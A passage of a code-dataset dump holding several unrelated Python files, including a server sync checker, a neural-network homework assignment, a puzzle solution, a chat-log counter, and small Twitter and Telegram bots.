int(float(input('Choose Software [] ? ')))\n if a in range(0, 7):\n self.softwareOption = a\n else:\n self.softwareOption = 0\n except:\n self.softwareOption = 0\n # versionOption\n if self.softwareOption == 0:\n self.versionOption = ''\n else:\n self.versionOption = input('Choose Version [] ? ')\n # softwareChoice\n self.softwareChoice = NtSoftware().getSoftware(self.softwareOption)\n # versionChoice\n if self.versionOption == '':\n self.versionChoice = NtVersion().getVersion(self.softwareChoice, self.versionOption)[0]\n else:\n self.versionChoice = self.versionOption\n\n\n# NtCrawl()\nclass NtCrawl(object):\n \"\"\"\n Class to crawl servers\n \"\"\"\n # def __init__(self, servers, software, options):\n # [self.checkSync(i, software, options) for i in servers.serverList]\n def __init__(self, servers, software):\n self.fullCrawl(servers, software)\n\n def checkSync(self, server, software, options):\n crawlString = '{}{}{}{} ...'.format(server[2]\n , software.softwareList[options.softwareOption][2]\n , options.versionChoice\n , software.softwareList[options.softwareOption][3])\n print('\\nTesting {}:'.format(server[1]))\n print(crawlString)\n if os.path.isfile(crawlString):\n print('OK')\n else:\n print('FAILED')\n\n def fullCrawl(self, serv, softw):\n for server in serv.serverList:\n print('-----------------------------------------------------------------------------')\n print(' {}'.format(server[1]))\n print('-----------------------------------------------------------------------------')\n for item in softw.softwareList[1:]:\n crawlstring = '{}{}{}{}'.format(server[2], item[2], item[4], item[3])\n if os.path.isfile(crawlstring):\n print(' OK : {} (version {})'.format(item[1], item[4]))\n else:\n print(' FAILED : {} (version {})'.format(item[1], item[4]))\n\n\n# test loop\ndef test():\n print('------------------------')\n print('Test.')\n print('------------------------')\n print('Servers:')\n print('------------------------')\n servidores = NtServers()\n #[print('Office: {}, Server: {}, Path: {}'.format(i[0], i[1], i[2])) for i in servidores.serverList]\n print('------------------------')\n print('Software:')\n print('------------------------')\n software = NtSoftware()\n [print('{}: {}'.format(i[0], i[1])) for i in software.softwareList]\n # print('------------------------')\n # print('Options:')\n print('------------------------')\n options = NtOptions()\n print('Software: {}, Version: {}'\n .format(options.softwareChoice, options.versionChoice))\n # options2 = NtOptions()\n # a = [[options2.softwareChoice[i], options2.versionChoice[i]] for i in range(0, len(options2.softwareChoice)-1)]\n # NtCrawl(servidores, software, options)\n NtCrawl(servidores, software)\n\n\n# main loop\ndef main():\n print('\\n=============================================================================')\n print(' Software Releases : Regional Servers Synchronisation Report')\n print('=============================================================================')\n servidores = NtServers()\n software = NtSoftware()\n # print('Options:')\n # print('------------------------')\n # [print('{}: {}'.format(i[0], i[1])) for i in software.softwareList]\n # print('------------------------')\n # options = NtOptions()\n # NtCrawl(servidores, software, options)\n NtCrawl(servidores, software)\n print('=============================================================================')\n print(' End of Report')\n print('=============================================================================\\n')\n\n\n# main, calling main loop\nif __name__ == '__main__':\n # test()\n main()\n","sub_path":"src/Natasha.py","file_name":"Natasha.py","file_ext":"py","file_size_in_byte":8982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"653781915","text":"import random\n\na = random.sample(range(100),random.randint(1,100))\n#creates a random list of length 1-100 from numbers 1-100\n\nb =[]\n\nb.append(a[0])\nb.append(a[-1])\n\nprint(a)\nprint(b)\n\n","sub_path":"11-ListEnds.py","file_name":"11-ListEnds.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"56022143","text":"class Node(object):\n \"\"\"Define Node-class objects.\"\"\"\n\n def __init__(self, val=None, next=None):\n \"\"\"Initiate a new instance of a Node object with attributes.\"\"\"\n self.val = val\n self.next = next\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def push(self, nodes):\n \"\"\"Define the push method for LinkedList-class object.\"\"\"\n\n if iter(nodes):\n for i in range(len(nodes)):\n new_node = Node(nodes[i], self.head)\n self.head = new_node\n else:\n new_node = Node(nodes, self.head)\n self.head = new_node\n\n def pop(self):\n \"\"\"Remove and returns the head node of the list.\"\"\"\n if self.head is None:\n raise IndexError(\"List is empty\")\n else:\n popped_node = self.head\n self.head = self.head.next\n return popped_node.data\n\nclass Solution:\n def mergeTwoLists(self, l1, l2):\n\n print(l1.val)\n\n return None\n\nif __name__ == '__main__':\n \n\n s = Solution()\n\n s.mergeTwoLists(l1,l2)\n","sub_path":"merge_lists.py","file_name":"merge_lists.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"517309511","text":"import numpy as np\r\nimport numpy.random as rnd\r\nimport matplotlib.pyplot as plt\r\nimport sklearn.neural_network as nn\r\nimport bonnerlib2 as graph\r\nimport sklearn\r\n\r\nprint (\"\\n\\nQuestion 1(a)\")\r\n\r\ndef genData(mu0,mu1,Sigma0,Sigma1,N):\r\n \r\n data0 = rnd.multivariate_normal(mu0,Sigma0, (N,1)).reshape((N,2))\r\n data1 = rnd.multivariate_normal(mu1,Sigma1, (N,1)).reshape((N,2))\r\n \r\n t0 = np.zeros(N, dtype = int) \r\n t1 = np.ones(N, dtype = int)\r\n t = np.concatenate([t0,t1])\r\n X = np.concatenate([data0,data1])\r\n\r\n return sklearn.utils.shuffle(X,t)\r\n\r\nmu0 = [0,-1]\r\nmu1 = [-1,1]\r\nsigma0 = np.array([(2.0, 0.5), (0.5,1.0)])\r\nsigma1 = np.array([(1.0,-1.0), (-1.0,2.0)])\r\nX_train,t_train = genData(mu0,mu1,sigma0,sigma1,1000)\r\nX_test,t_test = genData(mu0,mu1,sigma0,sigma1,10000)\r\n\r\n#--------------------------------------------------------------------------------------------------------------------------------\r\nprint (\"\\n\\nQuestion 1(b)\")\r\n\r\n#Classifier \r\nclf = nn.MLPClassifier((1,), \"tanh\", \"sgd\", learning_rate_init=0.01, max_iter= 10000,tol=10**(-10))\r\nclf = clf.fit(X_train,t_train)\r\n\r\ncolors = np.array(['r','b'])\r\nplt.figure()\r\nplt.suptitle('Question 1(b): Neural net with 1 hidden unit' )\r\nplt.scatter(X_train[:,0],X_train[:,1], s = 2, c = colors[t_train])\r\ngraph.dfContour(clf)\r\nprint(\"Explain this similarity\")\r\n\r\n\r\n#-------------------------------------------------------------------------------------------------------------------------\r\n\r\nprint (\"\\n\\nQuestion 1(c)\")\r\n\r\ncolors = np.array(['r','b'])\r\nplt.figure()\r\nplt.suptitle('Question 1(c): Neural net with 2 hidden units' )\r\nbestAcc = 0\r\nnum = 0\r\nbestNum = 0\r\nwhile(num != 9):\r\n plt.subplot(3,3, num+1)\r\n clf = nn.MLPClassifier((2,), \"tanh\", \"sgd\", learning_rate_init=0.01, max_iter= 10000,tol=10**(-10))\r\n clf = clf.fit(X_train,t_train)\r\n plt.scatter(X_train[:,0],X_train[:,1], s = 2, c = colors[t_train])\r\n graph.dfContour(clf)\r\n #Accuracy\r\n acc = clf.score(X_test,t_test)\r\n if (acc>bestAcc):\r\n bestAcc = acc\r\n bestNum = num\r\n bestclfC = clf\r\n \r\n num += 1\r\n \r\nplt.figure()\r\nplt.suptitle('Question 1(c): Best neural net with 2 hidden unit' )\r\nplt.scatter(X_train[:,0],X_train[:,1], s = 2, c = colors[t_train])\r\ngraph.dfContour(bestclfC)\r\nprint(bestAcc, bestNum)\r\n\r\n#------------------------------------------------------------------------------------------------------\r\n\r\nprint (\"\\n\\nQuestion 1(d)\")\r\n\r\ncolors = np.array(['r','b'])\r\nplt.figure()\r\nplt.suptitle('Question 1(d): Neural net with 3 hidden units' )\r\nbestAcc = 0\r\nnum = 0\r\nbestNum = 0\r\nwhile(num != 9):\r\n plt.subplot(3,3, num+1)\r\n clf = nn.MLPClassifier((3,), \"tanh\", \"sgd\", learning_rate_init=0.01, max_iter= 10000,tol=10**(-10))\r\n clf = clf.fit(X_train,t_train)\r\n plt.scatter(X_train[:,0],X_train[:,1], s = 2, c = colors[t_train])\r\n graph.dfContour(clf)\r\n #Accuracy\r\n acc = clf.score(X_test,t_test)\r\n if (acc>bestAcc):\r\n bestAcc = acc\r\n bestNum = num\r\n bestclfD = clf\r\n \r\n num += 1\r\n \r\nplt.figure()\r\nplt.suptitle('Question 1(d): Best neural net with 3 hidden unit' )\r\nplt.scatter(X_train[:,0],X_train[:,1], s = 2, c = colors[t_train])\r\ngraph.dfContour(bestclfD)\r\nprint(bestAcc, bestNum)\r\n\r\n#-----------------------------------------------------------------------------------------------\r\n\r\nprint (\"\\n\\nQuestion 1(e)\")\r\n\r\ncolors = np.array(['r','b'])\r\nplt.figure()\r\nplt.suptitle('Question 1(e): Neural net with 4 hidden units' )\r\nbestAcc = 0\r\nnum = 0\r\nbestNum = 0\r\nwhile(num != 9):\r\n plt.subplot(3,3, num+1)\r\n clf = nn.MLPClassifier((4,), \"tanh\", \"sgd\", learning_rate_init=0.01, max_iter= 10000,tol=10**(-10))\r\n clf = clf.fit(X_train,t_train)\r\n plt.scatter(X_train[:,0],X_train[:,1], s = 2, c = colors[t_train])\r\n graph.dfContour(clf)\r\n #Accuracy\r\n acc = clf.score(X_test,t_test)\r\n if (acc>bestAcc):\r\n bestAcc = acc\r\n bestNum = num\r\n bestclfE = clf\r\n \r\n num += 1\r\n \r\nplt.figure()\r\nplt.suptitle('Question 1(e): Best neural net with 4 hidden unit' )\r\nplt.scatter(X_train[:,0],X_train[:,1], s = 2, c = colors[t_train])\r\ngraph.dfContour(bestclfE)\r\nprint(bestAcc, bestNum)\r\n\r\n#-----------------------------------------------------------------------------------------------\r\n\r\nprint (\"\\n\\nQuestion 1(g)\")\r\n\r\n#Bias\r\nw0 = bestclfD.intercepts_\r\n#weight Vector\r\nw = bestclfD.coefs_\r\n\r\nplt.figure()\r\nplt.suptitle('Question 1(g): Decision boundaries for 3 hidden units' )\r\nplt.scatter(X_train[:,0],X_train[:,1], s = 2, c = colors[t_train])\r\nx = np.linspace(-5.0, 5.0, num=(1000))\r\nplt.xlim((-5,5))\r\nplt.ylim((-7,7))\r\nplt.plot(x,-(w[0][0][0]*x+w0[0][0])/(w[0][1][0]), c='black', linestyle='dashed')\r\nplt.plot(x,-(w[0][0][1]*x+w0[0][1])/(w[0][1][1]), c='black', linestyle='dashed')\r\nplt.plot(x,-(w[0][0][2]*x+w0[0][2])/(w[0][1][2]), c='black', linestyle='dashed')\r\ngraph.dfContour(bestclfD)\r\n\r\n#-----------------------------------------------------------------------------------------------\r\n\r\nprint (\"\\n\\nQuestion 1(h)\")\r\n\r\n#Bias\r\nw0 = bestclfC.intercepts_\r\n#weight Vector\r\nw = bestclfC.coefs_\r\n\r\nplt.figure()\r\nplt.suptitle('Question 1(h): Decision boundaries for 2 hidden units' )\r\nplt.scatter(X_train[:,0],X_train[:,1], s = 2, c = colors[t_train])\r\nx = np.linspace(-5.0, 5.0, num=(1000))\r\nplt.xlim((-5,5))\r\nplt.ylim((-7,7))\r\nplt.plot(x,-(w[0][0][0]*x+w0[0][0])/(w[0][1][0]), c='black', linestyle='dashed')\r\nplt.plot(x,-(w[0][0][1]*x+w0[0][1])/(w[0][1][1]), c='black', linestyle='dashed')\r\ngraph.dfContour(bestclfC)\r\n\r\n#-----------------------------------------------------------------------------------------------\r\n\r\nprint (\"\\n\\nQuestion 1(i)\")\r\n\r\n#Bias\r\nw0 = bestclfE.intercepts_\r\n#weight Vector\r\nw = bestclfE.coefs_\r\n\r\nplt.figure()\r\nplt.suptitle('Question 1(i): Decision boundaries for 4 hidden units' )\r\nplt.scatter(X_train[:,0],X_train[:,1], s = 2, c = colors[t_train])\r\nx = np.linspace(-5.0, 5.0, num=(1000))\r\nplt.xlim((-5,5))\r\nplt.ylim((-7,7))\r\nplt.plot(x,-(w[0][0][0]*x+w0[0][0])/(w[0][1][0]), c='black', linestyle='dashed')\r\nplt.plot(x,-(w[0][0][1]*x+w0[0][1])/(w[0][1][1]), c='black', linestyle='dashed')\r\nplt.plot(x,-(w[0][0][2]*x+w0[0][2])/(w[0][1][2]), c='black', linestyle='dashed')\r\nplt.plot(x,-(w[0][0][3]*x+w0[0][3])/(w[0][1][3]), c='black', linestyle='dashed')\r\ngraph.dfContour(bestclfE)\r\n\r\n#--------------------------------------------------------------------------------------------------\r\n\r\nprint('\\n\\nQuestion 1(k)')\r\n\r\n#Generate the curve\r\n\r\nM = 1000\r\nt = np.linspace(0,1,M)\r\nprecision = np.zeros([M])\r\nrecall = np.zeros([M])\r\n#TruePos = np.zeros([20000,4])\r\nnumPos = np.sum(t_test)\r\nlol = w[0]\r\nz= bestclfD.predict_proba(X_test)[:,1]\r\nfor n in range(M):\r\n PredictedPos = z>=t[n]\r\n TruePos = t_test & PredictedPos\r\n numPP = np.sum(PredictedPos)\r\n numTP = np.sum(TruePos)\r\n \r\n precision[n] = numTP/np.float(numPP)\r\n recall[n] = numTP/np.float(numPos)\r\n\r\nplt.figure()\r\nplt.suptitle('Question 1(k): Precision/recall curve')\r\nplt.plot(recall,precision)\r\nplt.xlabel('Recall')\r\nplt.ylabel('Precision')\r\n\r\n#----------------------------------------------------------------------------------------------------\r\n\r\nprint('\\n\\nQuestion 1(l)')\r\n\r\narea = 0.0\r\nfor m in range(1, len(recall)):\r\n area+= precision[m] * (recall[m-1]-recall[m])\r\nprint(area)\r\n\r\n#--------------------------------------------------------------------------------------------------\r\n\r\nprint('\\n\\nQuestion 3(a)')\r\n\r\nX_train,t_train = genData(mu0,mu1,sigma0,sigma1,10000)\r\nX_test,t_test = genData(mu0,mu1,sigma0,sigma1,10000)\r\n\r\n\r\ndef forward(X,V,v0,W,w0):\r\n u = np.matmul(X,V)+v0\r\n h = np.tanh(u)\r\n z = np.matmul(h,W)+w0\r\n o = 1 /(1 + np.exp(-z))\r\n o = o.reshape(-1,1)[:,0]\r\n return u,h,z,o\r\n\r\nnn3 = bestclfD\r\nw0 = nn3.intercepts_\r\nw = nn3.coefs_\r\nu,h,z,o1 = forward(X_test, w[0],w0[0],w[1],w0[1])\r\n\r\no2 = nn3.predict_proba(X_test)\r\n\r\ndiff = np.sum((o1-o2[:,1])**2)\r\nprint(diff)\r\n\r\n#-----------------------------------------------------------------------------------------------------\r\n\r\nprint('\\n\\nQuestion 3(b)')\r\n\r\n\r\n# *** modified ***\r\n \r\ndef MYdfContour(V,v0,W,w0):\r\n ax = plt.gca()\r\n # The extent of xy space\r\n x_min,x_max = ax.get_xlim()\r\n y_min,y_max = ax.get_ylim()\r\n \r\n # form a mesh/grid over xy space\r\n h = 0.02 # mesh granularity\r\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\r\n np.arange(y_min, y_max, h))\r\n mesh = np.c_[xx.ravel(),yy.ravel()]\r\n \r\n # evaluate the decision functrion at the grid points\r\n Z = forward(mesh, V,v0,W,w0)[3]\r\n \r\n # plot the contours of the decision function\r\n Z = Z.reshape(xx.shape)\r\n mylevels=np.linspace(0.0,1.0,11)\r\n ax.contourf(xx, yy, Z, levels=mylevels, cmap=cm.RdBu, alpha=0.5)\r\n \r\n # draw the decision boundary in solid black\r\n ax.contour(xx, yy, Z, levels=[0.5], colors='k', linestyles='solid')\r\n\r\ndef gradient(h,o,T,X,W):\r\n l = (o-T)/ np.shape(h)[0]\r\n w = np.matmul(np.transpose(h), l)\r\n w0 = np.sum(l,axis= 0)\r\n W = W.reshape([W.shape[0], 1])\r\n l = l.reshape([l.shape[0],1])\r\n l2 = np.matmul(l,np.transpose(W))*(1-h**2)\r\n v = np.matmul(np.transpose(l2), X)\r\n v0 = np.sum(l2,axis=0)\r\n return w, w0, np.transpose(v), v0\r\n\r\ndef bgd(J,K,lrate):\r\n \r\n #Ttrain = np.zeros([np.shape(X_train)[0]])\r\n #Ttest = np.zeros([np.shape(X_test)[0],K])\r\n\r\n W_weights = rnd.randn(J)\r\n W_bias = 0.0\r\n V_weights = rnd.randn(2,J)\r\n V_bias = np.zeros(J)\r\n \r\n Etrain = []\r\n\r\n accTrain = []\r\n accTest = []\r\n\r\n for i in range(0,K):\r\n \r\n u,h,z,o1 = forward(X_train, V_weights,V_bias,W_weights,W_bias)\r\n \r\n NW, Nw0, NV, Nv0 = gradient(h,o1, t_train, X_train, W_weights)\r\n\r\n W_weights = W_weights - lrate*NW\r\n W_bias = W_bias - lrate*Nw0\r\n V_weights = V_weights - lrate*NV\r\n V_bias = V_bias- lrate*Nv0\r\n \r\n \r\n \r\n if (i%10 == 0):\r\n o_test = forward(X_test, V_weights,V_bias,W_weights,W_bias)[3]\r\n o_train = forward(X_train, V_weights,V_bias,W_weights,W_bias)[3]\r\n predictions_test = o_test > 0.5 \r\n predictions_train = o_train > 0.5\r\n \r\n Etrain.append(-np.sum((t_train*np.log(o1)))/np.shape(t_train)[0])\r\n print('Loss Train ', -np.sum((t_train*np.log(o1)))/np.shape(t_train)[0])\r\n \r\n accTrain.append(np.mean(t_train == predictions_train)*100.0)\r\n print('Acc Train ', np.mean(t_train == predictions_train)*100.0)\r\n accTest.append(np.mean(t_test == predictions_test)*100.0)\r\n print('Acc Test ', np.mean(t_test == predictions_test)*100.0)\r\n \r\n\r\n print('Final Test Accuracy', accTest[-1])\r\n\r\n plt.figure()\r\n plt.suptitle('Question 3(b):training and test accuracy for bgd')\r\n plt.ylabel(\"accuracy\")\r\n plt.xlabel(\"epoch\")\r\n plt.semilogx(range(10,K+1,10),accTrain, '#FFA500')\r\n plt.semilogx(range(10,K+1, 10),accTest, 'b')\r\n \r\n plt.figure()\r\n plt.suptitle('Question 3(b):training loss for bgd')\r\n plt.ylabel(\"loss\")\r\n plt.xlabel(\"epoch\")\r\n plt.semilogx(range(10,K+1,10),Etrain, '#FFA500')\r\n \r\n plt.figure()\r\n plt.suptitle('Question 3(b): final test accuracy for bgd')\r\n plt.ylabel(\"accuracy\")\r\n plt.xlabel(\"training time\")\r\n plt.plot(accTest[-K//2:])\r\n \r\n plt.figure()\r\n plt.suptitle('Question 3(b): final training loss for bgd')\r\n plt.ylabel(\"accuracy\")\r\n plt.xlabel(\"training time\")\r\n plt.plot(Etrain[-K//2:])\r\n \r\n plt.figure()\r\n plt.suptitle('Question 3(b): Decisiom boundary for my neural net' )\r\n plt.scatter(X_train[:,0],X_train[:,1], s = 2, c = colors[t_train])\r\n MYdfContour(V_weights,V_bias,W_weights,W_bias)\r\n \r\nbgd(3,1000,1.0)\r\n\r\n#--------------------------------------------------------------------------------------\r\n\r\nprint('\\n\\nQuestion 3(c)')\r\n\r\ndef sgd(J,K,lrate):\r\n W_weights = rnd.randn(J)\r\n W_bias = 0.0\r\n V_weights = rnd.randn(2,J)\r\n V_bias = np.zeros(J)\r\n \r\n Etrain = []\r\n\r\n accTrain = []\r\n accTest = []\r\n \r\n for i in range(0,K):\r\n \r\n N1 = 0\r\n while (N1 < np.shape(t_train)[0]):\r\n \r\n N2 = np.min([N1+50,np.shape(t_train)[0]])\r\n X = X_train[N1:N2]\r\n T = t_train[N1:N2]\r\n N1 = N2\r\n \r\n u,h,z,o1 = forward(X, V_weights,V_bias,W_weights,W_bias)\r\n NW, Nw0, NV, Nv0 = gradient(h,o1, T, X, W_weights)\r\n \r\n W_weights = W_weights - lrate*NW\r\n W_bias = W_bias - lrate*Nw0\r\n V_weights = V_weights - lrate*NV\r\n V_bias = V_bias- lrate*Nv0\r\n\r\n o_test = forward(X_test, V_weights,V_bias,W_weights,W_bias)[3]\r\n o_train = forward(X_train, V_weights,V_bias,W_weights,W_bias)[3]\r\n predictions_test = o_test > 0.5 \r\n predictions_train = o_train > 0.5\r\n \r\n Etrain.append(-np.sum((T*np.log(o1)))/np.shape(T)[0])\r\n print('Loss Train ', -np.sum((T*np.log(o1)))/np.shape(T)[0])\r\n \r\n accTrain.append(np.mean(t_train == predictions_train)*100.0)\r\n print('Acc Train ', np.mean(t_train == predictions_train)*100.0)\r\n accTest.append(np.mean(t_test == predictions_test)*100.0)\r\n print('Acc Test ', np.mean(t_test == predictions_test)*100.0)\r\n \r\n\r\n print('Final Test Accuracy', accTest[-1])\r\n\r\n plt.figure()\r\n plt.suptitle('Question 3(c):training and test accuracy for bgd')\r\n plt.ylabel(\"accuracy\")\r\n plt.xlabel(\"epoch\")\r\n plt.semilogx(range(1,K+1),accTrain, '#FFA500')\r\n plt.semilogx(range(1,K+1),accTest, 'b')\r\n \r\n plt.figure()\r\n plt.suptitle('Question 3(c):training loss for bgd')\r\n plt.ylabel(\"loss\")\r\n plt.xlabel(\"epoch\")\r\n plt.semilogx(range(1,K+1),Etrain, '#FFA500')\r\n \r\n plt.figure()\r\n plt.suptitle('Question 3(c): final test accuracy for bgd')\r\n plt.ylabel(\"accuracy\")\r\n plt.xlabel(\"training time\")\r\n plt.plot(accTest[-K//2:])\r\n \r\n plt.figure()\r\n plt.suptitle('Question 3(c): final training loss for bgd')\r\n plt.ylabel(\"accuracy\")\r\n plt.xlabel(\"training time\")\r\n plt.plot(Etrain[-K//2:])\r\n \r\n plt.figure()\r\n plt.suptitle('Question 3(c): Decisiom boundary for my neural net' )\r\n plt.scatter(X_train[:,0],X_train[:,1], s = 2, c = colors[t_train])\r\n MYdfContour(V_weights,V_bias,W_weights,W_bias)\r\n \r\nsgd(3,20,1.0)","sub_path":"A3 2018/A3.py","file_name":"A3.py","file_ext":"py","file_size_in_byte":14407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"642244743","text":"post = [['A', 'P', 'O', 'R'], ['B', 'M', 'S'], []]\n\ncount = 0\ncurrent = 0\n\nn = int(input())\n\nfor i in range(n):\n receiver = input()\n r = receiver[0]\n\n if r in post[0]:\n target = 0\n elif r in post[1]:\n target = 1\n else:\n target = 2\n\n count += abs((target - current))\n current = target\n\nprint(count)","sub_path":"Timus/2023_Donald_is_a_postman.py","file_name":"2023_Donald_is_a_postman.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"364011496","text":"# 读取\ndef read_file(filename):\n with open(filename, 'r', encoding='utf-8-sig') as f:\n lines = []\n for line in f:\n lines.append(line.strip('\\n'))\n return lines\n\n\n# 转换\ndef convert(lines):\n chat = []\n allen_word_count = 0\n allen_sticker_count = 0\n allen_image_count = 0\n\n viki_word_count = 0\n viki_sticker_count = 0\n viki_image_count = 0\n for line in lines:\n s = line.split(' ')\n time = s[0]\n name = s[1]\n\n if name == 'Allen':\n if s[2] == '貼圖':\n allen_sticker_count += 1\n elif s[2] == '圖片':\n allen_image_count += 1\n else:\n for msg in s[2:]:\n allen_word_count += len(msg)\n elif name == 'Viki':\n if s[2] == '貼圖':\n viki_sticker_count += 1\n elif s[2] == '圖片':\n viki_image_count += 1\n else:\n for msg in s[2:]:\n viki_word_count += len(msg)\n\n print('allen说了', allen_word_count, '个字')\n print('allen发了', allen_sticker_count, '个贴图')\n print('allen发了', allen_image_count, '个字')\n\n print('viki说了', viki_word_count, '个字')\n print('viki发了', viki_sticker_count, '个贴图')\n print('viki发了', viki_image_count, '个字')\n\n return chat\n\n\n# 输出\ndef write_file(filename, lines):\n with open(filename, 'w', encoding='utf-8-sig') as f:\n for line in lines:\n f.write(line)\n\n\n# 合成main\ndef main():\n lines = read_file('LINE-Viki.txt')\n\n chat = convert(lines)\n\n # write_file('output.txt', chat)\n\n\nmain()","sub_path":"day5/十九。专案:聊天记录列表处理.py","file_name":"十九。专案:聊天记录列表处理.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"595948052","text":"import tweepy\nimport random\n\n\nclass Twitter(object):\n ''' simple class to 'tweet', requires configuration dict '''\n\n def __init__(self, conKey, conSecret, accKey, accSecret):\n ''' provide config dict, see tweet method for requirements '''\n auth = tweepy.OAuthHandler(conKey, conSecret)\n auth.set_access_token(accKey, accSecret)\n self.tweepy = tweepy.API(auth)\n\n def generate_message(self, year, id):\n # message options, url template\n messages = [\n 'Next up for auction is a {} Mexican Libertad!',\n 'An auction for a {} Mexican Libertad is ending soon!',\n 'Get this {} Mexican Libertad while you can!',\n 'Place your bid now on this {} Mexican Libertad'\n ]\n url = ' http://bitlibertad.com/year/{}/{}'\n # assemble message\n message = random.choice(messages).format(year)\n message += url.format(str(year), id)\n return message\n\n def tweet(self, tweet):\n self.tweepy.update_status(status=tweet)\n\n def tweet_with_image(self, tweet, image):\n self.tweepy.update_with_media(status=tweet, filename=image)\n\n","sub_path":"bitlibertad/twitter.py","file_name":"twitter.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"43755319","text":"\nimport config\nimport telebot, requests\nfrom telebot import types\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import db\n\n\n\ncred = credentials.Certificate(\"kasym.json\")\ndefault_app = firebase_admin.initialize_app(cred, {'databaseURL': 'https://grgrgrw-3bc83.firebaseio.com/'})\n\n\nbot = telebot.TeleBot(config.token)\n# Neoбычный режим\n@bot.message_handler(commands = ['start'])\n\ndef start(message):\n keyboard = types.ReplyKeyboardMarkup(row_width=1, resize_keyboard=True)\n keyboard.add(*[types.KeyboardButton(name) for name in ['Тарих', 'Физика', 'Биология','География']])\n msg = bot.send_message(message.chat.id, \"Салеметсизбе. Категория танданыз\", reply_markup = keyboard)\n bot.register_next_step_handler(msg, answer)\n\n@bot.message_handler(content_types = ['text'])\ndef answer(message):\n if message.text == \"Тарих\":\n keyboard = types.ReplyKeyboardMarkup(row_width=1, resize_keyboard=True)\n keyboard.add(*[types.KeyboardButton(question) for question in ['dada', 'baba', 'haha', 'gaga', 'fafa']])\n msg = bot.send_message(message.chat.id, \"Кандай суракты тандайсыз?\", reply_markup = keyboard)\n bot.register_next_step_handler(msg, answer_subject)\n if message.text == \"Физика\":\n keyboard = types.ReplyKeyboardMarkup(row_width=1, resize_keyboard=True)\n keyboard.add(*[types.KeyboardButton(question) for question in ['do', 'we', 'ba', 'ha', 'by']])\n msg = bot.send_message(message.chat.id, \"Кандай суракты тандайсыз?\", reply_markup = keyboard)\n bot.register_next_step_handler(msg, answer_subject)\n if message.text == \"Биология\":\n keyboard = types.ReplyKeyboardMarkup(row_width=1, resize_keyboard=True)\n keyboard.add(*[types.KeyboardButton(question) for question in ['dos', 'wes', 'bas', 'has', 'bys']])\n msg = bot.send_message(message.chat.id, \"Кандай суракты тандайсыз?\", reply_markup = keyboard)\n bot.register_next_step_handler(msg, answer_subject)\n if message.text == \"География\":\n keyboard = types.ReplyKeyboardMarkup(row_width=1, resize_keyboard=True)\n keyboard.add(*[types.KeyboardButton(question) for question in ['dosh', 'wesh', 'bash', 'hash', 'bysh']])\n msg = bot.send_message(message.chat.id, \"Кандай суракты тандайсыз?\", reply_markup = keyboard)\n bot.register_next_step_handler(msg, answer_subject)\n\n\n \n@bot.message_handler(content_types = ['text'])\ndef answer_subject(message):\n if message.text == 'dada':\n subject = db.reference('/Тарих/a/dada').get()\n bot.send_message(message.chat.id, subject)\n if message.text == 'baba':\n subject = db.reference('/Тарих/b/baba').get()\n bot.send_message(message.chat.id, subject)\n if message.text == 'haha':\n subject = db.reference('/Тарих/c/haha').get()\n bot.send_message(message.chat.id, subject)\n if message.text == 'gaga':\n subject = db.reference('/Тарих/d/gaga').get()\n bot.send_message(message.chat.id, subject)\n if message.text == 'fafa':\n subject = db.reference('/Тарих/e/dada').get()\n bot.send_message(message.chat.id, subject)\n \n\n \n \n \n\n'''\n@bot.message_handler(content_types=[\"text\"])\ndef any_msg(message):\n keyboard = types.InlineKeyboardMarkup()\n url_button = types.InlineKeyboardButton(text=\"Канал в YouTube\",url='https://www.youtube.com/channel/UC_cBsck6NyqzSDaNEfOJ5HQ' )\n url_button2 = types.InlineKeyboardButton(text=\"YouTube\",url='https://www.youtube.com')\n url_button3 = types.InlineKeyboardButton(text=\"Мой VK\",url='https://vk.com/id289417861')\n url_button4 = types.InlineKeyboardButton(text=\"Мой classroom\",url='https://classroom.google.com')\n keyboard.add(url_button, url_button2,url_button3, url_button4)\n bot.send_message(message.chat.id, \"Привет, подписывайся на меня в социальных сетях\", reply_markup=keyboard)\n\n@bot.message_handler(content_types=[\"text\"])\ndef geophone(message):\n bot.send_message(message.chat.id, \"Хочешь отправить мне свой телефон или местоположение? Отправь да или нет? \", reply_markup=keyboard)\n if message.text == \"да\":\n keyboard = types.ReplyKeyboardMarkup(row_width=1, resize_keyboard=True)\n button_phone = types.KeyboardButton(text=\"Отправить номер телефона\", request_contact=True)\n button_geo = types.KeyboardButton(text=\"Отправить местоположение\", request_location=True)\n keyboard.add(button_phone, button_geo)\n bot.send_message(message.chat.id, \"Отправь мне свой номер телефона или поделись местоположением, жалкий человечишка!\", reply_markup=keyboard)\n else:\n bot.send_message(message.chat.id, \"OK\", reply_markup=keyboard)\n\n\n \n\n\n\n\n\n\n\n \n\n keyboard = types.InlineKeyboardMarkup()\n if message.text=='привет':\n bot.send_message(message.chat.id, 'привет,как ваши дела?')\n if message.text == \"хорошо\":\n bot.send_message(message.chat.id, \"Quanyshtymyn!!\")\n bot.send_message(message.chat.id, 'Может вам понадобиться наши инлайн кнопки')\n if message.text == \"пока нет\":\n bot.send_message(message.chat.id, 'OK!!')\n elif message.text == 'давайте':\n keybord = telebot.types.InlineKeyboardMarkup()\n # bot.send_message(message.chat.id, 'Открываю https://classroom.google.com нажмите на ссылку')\n url_button = types.InlineKeyboardButton(text=\" k kaba kz\",url='https://www.youtube.com/channel/UC_cBsck6NyqzSDaNEfOJ5HQ'.format(message.text))\n url_button2 = types.InlineKeyboardButton(text=\"ютуб\",url='https://www.youtube.com'.format(message.text))\n url_button3 = types.InlineKeyboardButton(text=\"меня создал\",url='https://vk.com/id289417861'.format(message.text))\n url_button4 = 